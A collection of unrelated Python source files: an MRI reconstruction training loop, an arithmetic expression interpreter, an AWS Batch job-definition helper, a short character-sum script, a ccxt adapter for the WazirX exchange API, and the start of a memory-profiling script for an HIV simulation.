self._log_step_outputs(epoch, step, step_loss, step_metrics, training=False)
# Visualize images on TensorBoard.
self._visualize_images(recons, targets, extra_params, epoch, step, training=False)
# Converted to scalar and dict with scalar values respectively.
return self._get_epoch_outputs(epoch, epoch_loss, epoch_metrics, training=False)
def _val_step(self, inputs, targets, extra_params):
outputs = self.model(inputs)
recons = self.output_val_transform(outputs, targets, extra_params)
step_loss, step_metrics = self._step(recons, targets, extra_params)
return recons, step_loss, step_metrics
def _step(self, recons, targets, extra_params):
step_loss = self.losses['img_loss'](recons['img_recons'], targets['img_targets'])
# If img_loss is a tuple, it is expected to contain all its component losses as a dict in its second element.
step_metrics = dict()
if isinstance(step_loss, tuple):
step_loss, step_metrics = step_loss
acc = extra_params["acceleration"]
if step_metrics: # This has to be checked before anything is added to step_metrics.
for key, value in step_metrics.items():
step_metrics[f'acc_{acc}_{key}'] = value
step_metrics[f'acc_{acc}_loss'] = step_loss
return step_loss, step_metrics
def _visualize_images(self, recons, targets, extra_params, epoch, step, training=False):
mode = 'Training' if training else 'Validation'
# This numbering scheme seems to have issues for certain numbers.
# Please check cases when there is no remainder.
if self.display_interval and (step % self.display_interval == 0):
img_recon_grid = make_img_grid(recons['img_recons'], self.shrink_scale)
            # The delta image is obtained by subtracting the complex images, not the real-valued images.
delta_image = complex_abs(targets['cmg_targets'] - recons['cmg_recons'])
delta_img_grid = make_img_grid(delta_image, self.shrink_scale)
acc = extra_params['acceleration']
kwargs = dict(global_step=epoch, dataformats='HW')
self.writer.add_image(f'{mode} Image Recons/{acc}/{step}', img_recon_grid, **kwargs)
self.writer.add_image(f'{mode} Delta Image/{acc}/{step}', delta_img_grid, **kwargs)
if 'kspace_recons' in recons:
kspace_recon_grid = make_k_grid(recons['kspace_recons'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} k-space Recons/{acc}/{step}', kspace_recon_grid, **kwargs)
# Adding RSS images of reconstructions and targets.
if 'rss_recons' in recons:
recon_rss = standardize_image(recons['rss_recons'])
delta_rss = standardize_image(make_rss_slice(delta_image))
self.writer.add_image(f'{mode} RSS Recons/{acc}/{step}', recon_rss, **kwargs)
self.writer.add_image(f'{mode} RSS Delta/{acc}/{step}', delta_rss, **kwargs)
if 'semi_kspace_recons' in recons:
semi_kspace_recon_grid = make_k_grid(
recons['semi_kspace_recons'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} semi-k-space Recons/{acc}/{step}', semi_kspace_recon_grid, **kwargs)
if epoch == 1: # Maybe add input images too later on.
img_target_grid = make_img_grid(targets['img_targets'], self.shrink_scale)
self.writer.add_image(f'{mode} Image Targets/{acc}/{step}', img_target_grid, **kwargs)
if 'kspace_targets' in targets:
kspace_target_grid = \
make_k_grid(targets['kspace_targets'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} k-space Targets/{acc}/{step}', kspace_target_grid, **kwargs)
if 'img_inputs' in targets:
# Not actually the input but what the input looks like as an image.
img_grid = make_img_grid(targets['img_inputs'], self.shrink_scale)
self.writer.add_image(f'{mode} Inputs as Images/{acc}/{step}', img_grid, **kwargs)
if 'rss_targets' in targets:
target_rss = standardize_image(targets['rss_targets'])
self.writer.add_image(f'{mode} RSS Targets/{acc}/{step}', target_rss, **kwargs)
if 'semi_kspace_targets' in targets:
semi_kspace_target_grid = make_k_grid(
targets['semi_kspace_targets'], self.smoothing_factor, self.shrink_scale)
self.writer.add_image(f'{mode} semi-k-space Targets/{acc}/{step}',
semi_kspace_target_grid, **kwargs)
def _get_slice_metrics(self, recons, targets, extra_params):
img_recons = recons['img_recons'].detach() # Just in case.
img_targets = targets['img_targets'].detach()
max_range = img_targets.max() - img_targets.min()
slice_ssim = self.ssim(img_recons, img_targets)
slice_psnr = psnr(img_recons, img_targets, data_range=max_range)
slice_nmse = nmse(img_recons, img_targets)
slice_metrics = {'slice/ssim': slice_ssim, 'slice/nmse': slice_nmse, 'slice/psnr': slice_psnr}
if 'rss_recons' in recons:
rss_recons = recons['rss_recons'].detach()
rss_targets = targets['rss_targets'].detach()
max_range = rss_targets.max() - rss_targets.min()
rss_ssim = self.ssim(rss_recons, rss_targets)
rss_psnr = psnr(rss_recons, rss_targets, data_range=max_range)
rss_nmse = nmse(rss_recons, rss_targets)
slice_metrics['rss/ssim'] = rss_ssim
slice_metrics['rss/psnr'] = rss_psnr
slice_metrics['rss/nmse'] = rss_nmse
else:
rss_ssim = rss_psnr = rss_nmse = 0
# Additional metrics for separating between acceleration factors.
if 'acceleration' in extra_params:
acc = extra_params["acceleration"]
slice_metrics[f'slice_acc_{acc}/ssim'] = slice_ssim
slice_metrics[f'slice_acc_{acc}/psnr'] = slice_psnr
slice_metrics[f'slice_acc_{acc}/nmse'] = slice_nmse
if 'rss_recons' in recons:
slice_metrics[f'rss_acc_{acc}/ssim'] = rss_ssim
slice_metrics[f'rss_acc_{acc}/psnr'] = rss_psnr
slice_metrics[f'rss_acc_{acc}/nmse'] = rss_nmse
return slice_metrics
def _get_epoch_outputs(self, epoch, epoch_loss, epoch_metrics, training=True):
mode = 'Training' if training else 'Validation'
num_slices = len(self.train_loader.dataset) if training else len(self.val_loader.dataset)
# Checking for nan values.
epoch_loss = torch.stack(epoch_loss)
is_finite = torch.isfinite(epoch_loss)
num_nans = (is_finite.size(0) - is_finite.sum()).item()
if num_nans > 0:
            self.logger.warning(f'Epoch {epoch} {mode}: {num_nans} NaN values present in {num_slices} slices. '
                                f'Turning on anomaly detection.')
# Turn on anomaly detection for finding where the nan values are.
torch.autograd.set_detect_anomaly(True)
epoch_loss = torch.mean(epoch_loss[is_finite]).item()
else:
epoch_loss = torch.mean(epoch_loss).item()
for key, value in epoch_metrics.items():
epoch_metric = torch.stack(value)
is_finite = torch.isfinite(epoch_metric)
num_nans = (is_finite.size(0) - is_finite.sum()).item()
if num_nans > 0:
                self.logger.warning(f'Epoch {epoch} {mode} {key}: {num_nans} NaN values present in {num_slices} '
                                    f'slices. Turning on anomaly detection.')
epoch_metrics[key] = torch.mean(epoch_metric[is_finite]).item()
else:
epoch_metrics[key] = torch.mean(epoch_metric).item()
return epoch_loss, epoch_metrics
def _log_step_outputs(self, epoch, step, step_loss, step_metrics, training=True):
mode = 'Training' if training else 'Validation'
self.logger.info(f'Epoch {epoch:03d} Step {step:03d} {mode} loss: {step_loss.item():.4e}')
for key, value in step_metrics.items():
self.logger.info(f'Epoch {epoch:03d} Step {step:03d}: {mode} {key}: {value.item():.4e}')
def _log_epoch_outputs(self, epoch, epoch_loss, epoch_metrics, elapsed_secs, training=True):
mode = 'Training' if training else 'Validation'
self.logger.info(f'Epoch {epoch:03d} {mode}. loss: {epoch_loss:.4e}, '
f'Time: {elapsed_secs // 60} min {elapsed_secs % 60} sec')
self.writer.add_scalar(f'{mode} epoch_loss', scalar_value=epoch_loss, global_step=epoch)
for key, value in epoch_metrics.items():
self.logger.info(f'Epoch {epoch:03d} {mode}. {key}: {value:.4e}')
# Very important whether it is mode_~~ or mode/~~.
if 'loss' in key:
self.writer.add_scalar(f'{mode}/epoch_{key}', scalar_value=value, global_step=epoch)
else:
self.writer.add_scalar(f'{mode}_epoch_{key}', scalar_value=value, global_step=epoch)
if not training: # Record learning rate.
for idx, group in enumerate(self.optimizer.param_groups, start=1):
self.writer.add_scalar(f'learning_rate_{idx}', group['lr'], global_step=epoch)
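# A minimal wiring sketch (hypothetical `args`, model, loaders, and transforms;
# only the ModelTrainerIMG API above is real):
#
#   model = MyReconModel().to(args.device)
#   optimizer = optim.Adam(model.parameters(), lr=1e-3)
#   losses = {'img_loss': nn.L1Loss()}  # a single loss module, as _step() expects.
#   trainer = ModelTrainerIMG(args, model, optimizer, train_loader, val_loader,
#                             input_train_transform, input_val_transform,
#                             output_train_transform, output_val_transform,
#                             losses, scheduler=None)
#   trainer.train_model()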
|
from nodes import *
from tokens import Token, TokenType
class Interpreter:
def __init__(self, ast):
self.ast = ast
def eval(self):
return self.evalHelper(self.ast)
def evalHelper(self, ast):
if isinstance(ast, NumberNode):
return ast.node
elif isinstance(ast, AddNode):
return self.evalHelper(ast.node_a) + self.evalHelper(ast.node_b)
elif isinstance(ast, SubtractNode):
return self.evalHelper(ast.node_a) - self.evalHelper(ast.node_b)
elif isinstance(ast, MultiplyNode):
return self.evalHelper(ast.node_a) * self.evalHelper(ast.node_b)
elif isinstance(ast, DivideNode):
eval_b = self.evalHelper(ast.node_b)
if eval_b == 0:
raise ZeroDivisionError("Cannot divide by zero")
return self.evalHelper(ast.node_a) / eval_b
elif isinstance(ast, ModuloNode):
eval_b = self.evalHelper(ast.node_b)
if eval_b == 0:
raise ZeroDivisionError("Cannot divide by zero")
return self.evalHelper(ast.node_a) % eval_b
elif isinstance(ast, PowerNode):
return self.evalHelper(ast.node_a) ** self.evalHelper(ast.node_b)
elif isinstance(ast, PositiveNode):
return self.evalHelper(ast.node)
        elif isinstance(ast, NegativeNode):
            return -self.evalHelper(ast.node)
        else:
            raise TypeError(f"Unknown AST node: {type(ast).__name__}")
def postfix_eval(tokens):
stack = []
for t in tokens:
if t.type == TokenType.PLUS:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, a + b))
elif t.type == TokenType.MINUS:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, b - a))
elif t.type == TokenType.MULTIPLY:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, a * b))
        elif t.type == TokenType.DIVIDE:
            a = stack.pop().value
            b = stack.pop().value
            if a == 0:
                raise ZeroDivisionError("Cannot divide by zero")
            stack.append(Token(TokenType.NUMBER, b / a))
        elif t.type == TokenType.MODULO:
            a = stack.pop().value
            b = stack.pop().value
            if a == 0:
                raise ZeroDivisionError("Cannot divide by zero")
            stack.append(Token(TokenType.NUMBER, b % a))
elif t.type == TokenType.POWER:
a = stack.pop().value
b = stack.pop().value
stack.append(Token(TokenType.NUMBER, b ** a))
else:
stack.append(t)
return stack[0].value
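# A small usage sketch (illustrative token stream; operator tokens get a dummy
# value of None since postfix_eval only reads their type):
if __name__ == "__main__":
    # Postfix form of (2 + 3) * 4, which evaluates to 20.
    tokens = [
        Token(TokenType.NUMBER, 2),
        Token(TokenType.NUMBER, 3),
        Token(TokenType.PLUS, None),
        Token(TokenType.NUMBER, 4),
        Token(TokenType.MULTIPLY, None),
    ]
    print(postfix_eval(tokens))  # 20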
|
import hashlib
import json
import os
import boto3
from .retry import retry_on_aws_too_many_requests
batch = boto3.client('batch')
class JobDefinition:
@classmethod
def clear_all(cls):
deleted_count = 0
for jobdef in batch.describe_job_definitions(status='ACTIVE')['jobDefinitions']:
cls(metadata=jobdef).delete()
deleted_count += 1
return deleted_count
def __init__(self, docker_image=None, deployment=None, arn=None, metadata=None):
self.deployment = deployment if deployment else os.environ['DEPLOYMENT_STAGE']
if not docker_image and not metadata:
raise RuntimeError("you must provide docker_image or metadata")
self.metadata = metadata
self.docker_image = docker_image if docker_image else metadata['containerProperties']['image']
self.name = self._job_definition_name() if docker_image else metadata['jobDefinitionName']
        if arn:
            self.arn = arn
        elif metadata:
            self.arn = metadata['jobDefinitionArn']
print(f"Job definition {self.name} for {self.docker_image}:")
def find_or_create(self, job_role_arn):
if self.load():
print(f"\tfound {self.arn}")
else:
self.create(job_role_arn)
return self
def load(self):
jobdefs = self._describe_job_definitions(jobDefinitionName=self.name, status='ACTIVE')['jobDefinitions']
if len(jobdefs) > 0:
self.metadata = jobdefs[0]
self.arn = self.metadata['jobDefinitionArn']
return self
else:
return None
@retry_on_aws_too_many_requests
def create(self, job_role_arn):
self.metadata = batch.register_job_definition(
jobDefinitionName=self.name,
type='container',
parameters={},
containerProperties={
'image': self.docker_image,
'vcpus': 4,
'memory': 15000,
'command': [],
'jobRoleArn': job_role_arn,
'volumes': [
{
'host': {'sourcePath': '/data'},
'name': 'data'
},
],
'mountPoints': [
{
'containerPath': '/data',
'readOnly': False,
'sourceVolume': 'data'
},
]
},
retryStrategy={
'attempts': 3
}
)
self.arn = self.metadata['jobDefinitionArn']
print(f"\tcreated {self.arn}")
print(json.dumps(self.metadata, indent=4))
def delete(self):
print(f"Deleting job definition {self.name} ({self.docker_image})")
batch.deregister_job_definition(jobDefinition=self.arn)
@retry_on_aws_too_many_requests
def _describe_job_definitions(self, *args, **kwargs):
return batch.describe_job_definitions(*args, **kwargs)
def _job_definition_name(self):
"""
We create Job Definitions for each unique docker image we are given.
        As there is no way to search for job definitions with a particular Docker image,
we must put the Docker image name in the job definition name (the only thing we can search on).
We hash the image name as it will contain characters that aren't allowed in a job definition name.
"""
hasher = hashlib.sha1()
hasher.update(bytes(self.docker_image, 'utf8'))
return f"upload-{self.deployment}-{hasher.hexdigest()}"
|
n = int(input())
total_sum = 0
for _ in range(n):
letter = input()
total_sum += ord(letter)
print(f"The sum equals: {total_sum}")
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.precise import Precise
class wazirx(Exchange):
def describe(self):
return self.deep_extend(super(wazirx, self).describe(), {
'id': 'wazirx',
'name': 'WazirX',
'countries': ['IN'],
'version': 'v2',
'rateLimit': 100,
'has': {
'cancelAllOrders': True,
'cancelOrder': True,
'CORS': False,
'createOrder': True,
'fetchCurrencies': False,
'fetchBalance': True,
'fetchBidsAsks': False,
'fetchClosedOrders': False,
'fetchDepositAddress': False,
'fetchDeposits': True,
'fetchFundingFees': False,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRates': False,
'fetchMarkets': True,
'fetchMyTrades': False,
'fetchOHLCV': False,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrders': True,
'fetchOrderBook': True,
'fetchPositions': False,
'fetchStatus': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTradingFee': False,
'fetchTradingFees': False,
'fetchTransactions': False,
'fetchWithdrawals': False,
'setLeverage': False,
'withdraw': False,
'fetchDepositAddressesByNetwork': False,
'transfer': False,
'fetchTransfers': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/148647666-c109c20b-f8ac-472f-91c3-5f658cb90f49.jpeg',
'api': 'https://api.wazirx.com/sapi/v1',
'www': 'https://wazirx.com',
'doc': 'https://docs.wazirx.com/#public-rest-api-for-wazirx',
'fees': 'https://wazirx.com/fees',
},
'api': {
'public': {
'get': {
'exchangeInfo': 1,
'depth': 1,
'ping': 1,
'systemStatus': 1,
'tickers/24hr': 1,
'ticker/24hr': 1,
'time': 1,
'trades': 1,
},
},
'private': {
'get': {
'account': 1,
'allOrders': 1,
'funds': 1,
'historicalTrades': 1,
'openOrders': 1,
'order': 1,
},
'post': {
'order': 1,
'order/test': 1,
},
'delete': {
'order': 1,
'openOrders': 1,
},
},
},
'fees': {
'WRX': {'maker': self.parse_number('0.0'), 'taker': self.parse_number('0.0')},
},
'exceptions': {
'exact': {
'-1121': BadSymbol, # {"code": -1121, "message": "Invalid symbol."}
'1999': BadRequest, # {"code":1999,"message":"symbol is missing, symbol does not have a valid value"} message varies depending on the error
'2002': InsufficientFunds, # {"code":2002,"message":"Not enough USDT balance to execute self order"}
'2005': BadRequest, # {"code":2005,"message":"Signature is incorrect."}
'2078': PermissionDenied, # {"code":2078,"message":"Permission denied."}
'2098': BadRequest, # {"code":2098,"message":"Request out of receiving window."}
'2031': InvalidOrder, # {"code":2031,"message":"Minimum buy amount must be worth 2.0 USDT"}
'2113': BadRequest, # {"code":2113,"message":"RecvWindow must be in range 1..60000"}
'2115': BadRequest, # {"code":2115,"message":"Signature not found."}
'2136': RateLimitExceeded, # {"code":2136,"message":"Too many api request"}
'94001': InvalidOrder, # {"code":94001,"message":"Stop price not found."}
},
},
'options': {
# 'fetchTradesMethod': 'privateGetHistoricalTrades',
'recvWindow': 10000,
},
})
def fetch_markets(self, params={}):
response = self.publicGetExchangeInfo(params)
#
# {
# "timezone":"UTC",
# "serverTime":1641336850932,
# "symbols":[
# {
# "symbol":"btcinr",
# "status":"trading",
# "baseAsset":"btc",
# "quoteAsset":"inr",
# "baseAssetPrecision":5,
# "quoteAssetPrecision":0,
# "orderTypes":[
# "limit",
# "stop_limit"
# ],
# "isSpotTradingAllowed":true,
# "filters":[
# {
# "filterType":"PRICE_FILTER",
# "minPrice":"1",
# "tickSize":"1"
# }
# ]
# },
#
markets = self.safe_value(response, 'symbols', [])
result = []
for i in range(0, len(markets)):
entry = markets[i]
id = self.safe_string(entry, 'symbol')
baseId = self.safe_string(entry, 'baseAsset')
quoteId = self.safe_string(entry, 'quoteAsset')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
isSpot = self.safe_value(entry, 'isSpotTradingAllowed')
filters = self.safe_value(entry, 'filters')
minPrice = None
for j in range(0, len(filters)):
filter = filters[j]
filterType = self.safe_string(filter, 'filterType')
if filterType == 'PRICE_FILTER':
minPrice = self.safe_number(filter, 'minPrice')
fee = self.safe_value(self.fees, quote, {})
takerString = self.safe_string(fee, 'taker', '0.2')
takerString = Precise.string_div(takerString, '100')
taker = self.parse_number(takerString)
makerString = self.safe_string(fee, 'maker', '0.2')
makerString = Precise.string_div(makerString, '100')
maker = self.parse_number(makerString)
status = self.safe_string(entry, 'status')
active = status == 'trading'
limits = {
'price': {
'min': minPrice,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
}
precision = {
'price': self.safe_integer(entry, 'quoteAssetPrecision'),
'amount': self.safe_integer(entry, 'baseAssetPrecision'),
}
result.append({
'info': entry,
'symbol': symbol,
'id': id,
'base': base,
'quote': quote,
'baseId': baseId,
'maker': maker,
'taker': taker,
'quoteId': quoteId,
'limits': limits,
'precision': precision,
'type': 'spot',
'spot': isSpot,
'active': active,
})
return result
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # [1, 5, 10, 20, 50, 100, 500, 1000]
response = self.publicGetDepth(self.extend(request, params))
#
# {
# "timestamp":1559561187,
# "asks":[
# ["8540.0","1.5"],
# ["8541.0","0.0042"]
# ],
# "bids":[
# ["8530.0","0.8814"],
# ["8524.0","1.4"]
# ]
# }
#
        timestamp = self.safe_timestamp(response, 'timestamp')  # the endpoint returns seconds, not milliseconds
return self.parse_order_book(response, symbol, timestamp)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
ticker = self.publicGetTicker24hr(self.extend(request, params))
#
# {
# "symbol":"wrxinr",
# "baseAsset":"wrx",
# "quoteAsset":"inr",
# "openPrice":"94.77",
# "lowPrice":"92.7",
# "highPrice":"95.17",
# "lastPrice":"94.03",
# "volume":"1118700.0",
# "bidPrice":"94.02",
# "askPrice":"94.03",
# "at":1641382455000
# }
#
return self.parse_ticker(ticker, market)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTickers24hr()
#
# [
# {
# "symbol":"btcinr",
# "baseAsset":"btc",
# "quoteAsset":"inr",
# "openPrice":"3698486",
# "lowPrice":"3641155.0",
# "highPrice":"3767999.0",
# "lastPrice":"3713212.0",
# "volume":"254.11582",
# "bidPrice":"3715021.0",
# "askPrice":"3715022.0",
# }
# ...
# ]
#
result = {}
for i in range(0, len(tickers)):
ticker = tickers[i]
parsedTicker = self.parse_ticker(ticker)
symbol = parsedTicker['symbol']
result[symbol] = parsedTicker
return result
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['limit'] = limit # Default 500; max 1000.
method = self.safe_string(self.options, 'fetchTradesMethod', 'publicGetTrades')
response = getattr(self, method)(self.extend(request, params))
# [
# {
# "id":322307791,
# "price":"93.7",
# "qty":"0.7",
# "quoteQty":"65.59",
# "time":1641386701000,
# "isBuyerMaker":false
# },
# ]
return self.parse_trades(response, market, since, limit)
def parse_trade(self, trade, market=None):
#
# {
# "id":322307791,
# "price":"93.7",
# "qty":"0.7",
# "quoteQty":"65.59",
# "time":1641386701000,
# "isBuyerMaker":false
# }
#
id = self.safe_string(trade, 'id')
        timestamp = self.safe_integer(trade, 'time')  # 'time' is already a millisecond timestamp
datetime = self.iso8601(timestamp)
symbol = None
if market is not None:
symbol = market['symbol']
isBuyerMaker = self.safe_value(trade, 'isBuyerMaker')
side = 'sell' if isBuyerMaker else 'buy'
price = self.safe_number(trade, 'price')
amount = self.safe_number(trade, 'qty')
cost = self.safe_number(trade, 'quoteQty')
return self.safe_trade({
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': datetime,
'symbol': symbol,
'order': id,
'type': None,
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
})
def fetch_status(self, params={}):
response = self.publicGetSystemStatus(params)
#
# {"status":"normal","message":"System is running normally."}
#
status = self.safe_string(response, 'status')
status = 'ok' if (status == 'normal') else 'maintenance'
self.status = self.extend(self.status, {
'status': status,
'updated': self.milliseconds(),
})
return self.status
def fetch_time(self, params={}):
response = self.publicGetTime(params)
#
# {
# "serverTime":1635467280514
# }
#
return self.safe_integer(response, 'serverTime')
def parse_ticker(self, ticker, market=None):
#
# {
# "symbol":"btcinr",
# "baseAsset":"btc",
# "quoteAsset":"inr",
# "openPrice":"3698486",
# "lowPrice":"3641155.0",
# "highPrice":"3767999.0",
# "lastPrice":"3713212.0",
# "volume":"254.11582", # base volume
# "bidPrice":"3715021.0",
# "askPrice":"3715022.0",
# "at":1641382455000 # only on fetchTicker
# }
#
marketId = self.safe_string(ticker, 'symbol')
market = self.safe_market(marketId, market)
symbol = market['symbol']
last = self.safe_number(ticker, 'lastPrice')
open = self.safe_number(ticker, 'openPrice')
high = self.safe_number(ticker, 'highPrice')
low = self.safe_number(ticker, 'lowPrice')
baseVolume = self.safe_number(ticker, 'volume')
bid = self.safe_number(ticker, 'bidPrice')
ask = self.safe_number(ticker, 'askPrice')
        timestamp = self.safe_integer(ticker, 'at')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': high,
'low': low,
'bid': bid,
'bidVolume': None,
'ask': ask,
'askVolume': None,
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': None,
'info': ticker,
}, market)
def parse_balance(self, response):
result = {}
for i in range(0, len(response)):
balance = response[i]
id = self.safe_string(balance, 'asset')
code = self.safe_currency_code(id)
account = self.account()
account['free'] = self.safe_string(balance, 'free')
account['used'] = self.safe_string(balance, 'locked')
result[code] = account
return self.safe_balance(result)
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetFunds(params)
#
# [
# {
# "asset":"inr",
# "free":"0.0",
# "locked":"0.0"
# },
# ]
#
return self.parse_balance(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if since is not None:
request['startTime'] = since
if limit is not None:
request['limit'] = limit
response = self.privateGetAllOrders(self.extend(request, params))
# [
# {
# "id": 28,
# "symbol": "wrxinr",
# "price": "9293.0",
# "origQty": "10.0",
# "executedQty": "8.2",
# "status": "cancel",
# "type": "limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1499827319559
# },
# {
# "id": 30,
# "symbol": "wrxinr",
# "price": "9293.0",
# "stopPrice": "9200.0",
# "origQty": "10.0",
# "executedQty": "0.0",
# "status": "cancel",
# "type": "stop_limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1507725176595
# }
# ]
orders = self.parse_orders(response, market, since, limit)
orders = self.filter_by(orders, 'symbol', symbol)
return orders
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {}
market = None
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
response = self.privateGetOpenOrders(self.extend(request, params))
# [
# {
# "id": 28,
# "symbol": "wrxinr",
# "price": "9293.0",
# "origQty": "10.0",
# "executedQty": "8.2",
# "status": "cancel",
# "type": "limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1499827319559
# },
# {
# "id": 30,
# "symbol": "wrxinr",
# "price": "9293.0",
# "stopPrice": "9200.0",
# "origQty": "10.0",
# "executedQty": "0.0",
# "status": "cancel",
# "type": "stop_limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1507725176595
# }
# ]
orders = self.parse_orders(response, market, since, limit)
return orders
def cancel_all_orders(self, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelAllOrders requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
return self.privateDeleteOpenOrders(self.extend(request, params))
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'orderId': id,
}
response = self.privateDeleteOrder(self.extend(request, params))
return self.parse_order(response)
def create_order(self, symbol, type, side, amount, price=None, params={}):
        if (type != 'limit') and (type != 'stop_limit'):
raise ExchangeError(self.id + ' createOrder() supports limit and stop_limit orders only')
if price is None:
raise ExchangeError(self.id + ' createOrder() requires a price argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'side': side,
'quantity': amount,
'type': 'limit',
}
request['price'] = self.price_to_precision(symbol, price)
stopPrice = self.safe_string(params, 'stopPrice')
if stopPrice is not None:
request['type'] = 'stop_limit'
response = self.privatePostOrder(self.extend(request, params))
# {
# "id": 28,
# "symbol": "wrxinr",
# "price": "9293.0",
# "origQty": "10.0",
# "executedQty": "8.2",
# "status": "wait",
# "type": "limit",
# "side": "sell",
# "createdTime": 1499827319559,
# "updatedTime": 1499827319559
# }
return self.parse_order(response, market)
def parse_order(self, order, market=None):
# {
# "id":1949417813,
# "symbol":"ltcusdt",
# "type":"limit",
# "side":"sell",
# "status":"done",
# "price":"146.2",
# "origQty":"0.05",
# "executedQty":"0.05",
# "createdTime":1641252564000,
# "updatedTime":1641252564000
# },
created = self.safe_integer(order, 'createdTime')
updated = self.safe_integer(order, 'updatedTime')
marketId = self.safe_string(order, 'symbol')
symbol = self.safe_symbol(marketId, market)
        amount = self.safe_string(order, 'origQty')
filled = self.safe_string(order, 'executedQty')
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
price = self.safe_string(order, 'price')
type = self.safe_string_lower(order, 'type')
side = self.safe_string_lower(order, 'side')
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': None,
'timestamp': created,
'datetime': self.iso8601(created),
'lastTradeTimestamp': updated,
'status': status,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'remaining': None,
'cost': None,
'fee': None,
'average': None,
'trades': [],
}, market)
def parse_order_status(self, status):
statuses = {
'wait': 'open',
'done': 'closed',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
if api == 'private':
self.check_required_credentials()
timestamp = self.milliseconds()
data = self.extend({'recvWindow': self.options['recvWindow'], 'timestamp': timestamp}, params)
data = self.keysort(data)
signature = self.hmac(self.encode(self.urlencode(data)), self.encode(self.secret), hashlib.sha256)
url += '?' + self.urlencode(data)
url += '&signature=' + signature
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Api-Key': self.apiKey,
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
#
# {"code":2098,"message":"Request out of receiving window."}
#
if response is None:
return
errorCode = self.safe_string(response, 'code')
if errorCode is not None:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)
raise ExchangeError(feedback)
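# A minimal usage sketch (public endpoints only, so no API keys are needed;
# the symbol below is illustrative):
#
#   exchange = wazirx()
#   exchange.load_markets()
#   print(exchange.fetch_ticker('BTC/INR')['last'])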
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 23 14:16:27 2013
@author: Lucio
Program for assessing the memory footprint of the simulation. Needs the
memory_profiler module (installed on the milano cluster).
"""
import os
import time
import sys
import simpactpurple
from memory_profiler import profile
@profile
def run_single(pop):
s = simpactpurple.Community()
s.INITIAL_POPULATION = pop
#Simulate a run of the simulation
s.start() # initialize data structures
#a few timesteps
s.update_recruiting(s.RECRUIT_INITIAL)
for i in range(s.RECRUIT_WARM_UP):
s.time = i
s.time_operator.step() # 1. Time progresses
s.relationship_operator.step() # 2. Form and dissolve relationships
s.infection_operator.step() # 3. HIV transmission
s.update_recruiting(s.RECRUIT_RATE)
for i in range(s.RECRUIT_WARM_UP, int(s.NUMBER_OF_YEARS*52)):
s.time = i
s.time_operator.step() # 1. Time progresses
s.relationship_operator.step() # 2. Form and dissolve relationships
